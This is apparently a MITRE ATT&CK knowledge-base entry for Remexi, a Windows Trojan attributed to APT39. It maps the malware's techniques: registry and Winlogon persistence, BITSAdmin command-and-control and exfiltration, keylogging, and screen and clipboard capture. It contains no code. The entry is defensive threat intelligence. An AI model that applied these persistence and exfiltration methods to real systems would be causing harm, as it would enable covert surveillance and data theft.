Skip to content

S0375 Remexi

Remexi is a Windows-based Trojan that was developed in the C programming language.1

Item Value
ID S0375
Associated Names
Version 1.1
Created 17 April 2019
Last Modified 30 March 2020
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols Remexi uses BITSAdmin to communicate with the C2 server over HTTP.1
enterprise T1010 Application Window Discovery Remexi has a command to capture active windows on the machine and retrieve window titles.1
enterprise T1560 Archive Collected Data Remexi encrypts and adds all gathered browser data into files for upload to C2.1
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.1
enterprise T1547.004 Winlogon Helper DLL Remexi achieves persistence using Userinit by adding the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit.1
enterprise T1115 Clipboard Data Remexi collects text from the clipboard.1
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.003 Windows Command Shell Remexi silently executes received commands with cmd.exe.1
enterprise T1059.005 Visual Basic Remexi uses AutoIt and VBS scripts throughout its execution process.1
enterprise T1140 Deobfuscate/Decode Files or Information Remexi decrypts the configuration data using XOR with 25-character keys.1
enterprise T1041 Exfiltration Over C2 Channel Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.1
enterprise T1083 File and Directory Discovery Remexi searches for files on the system. 1
enterprise T1056 Input Capture -
enterprise T1056.001 Keylogging Remexi gathers and exfiltrates keystrokes from the machine.1
enterprise T1027 Obfuscated Files or Information Remexi obfuscates its configuration data with XOR.1
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Remexi utilizes scheduled tasks as a persistence mechanism.1
enterprise T1113 Screen Capture Remexi takes screenshots of windows of interest.1
enterprise T1047 Windows Management Instrumentation Remexi executes received commands with wmic.exe (for WMI commands). 1

Groups That Use This Software

ID Name References
G0087 APT39 213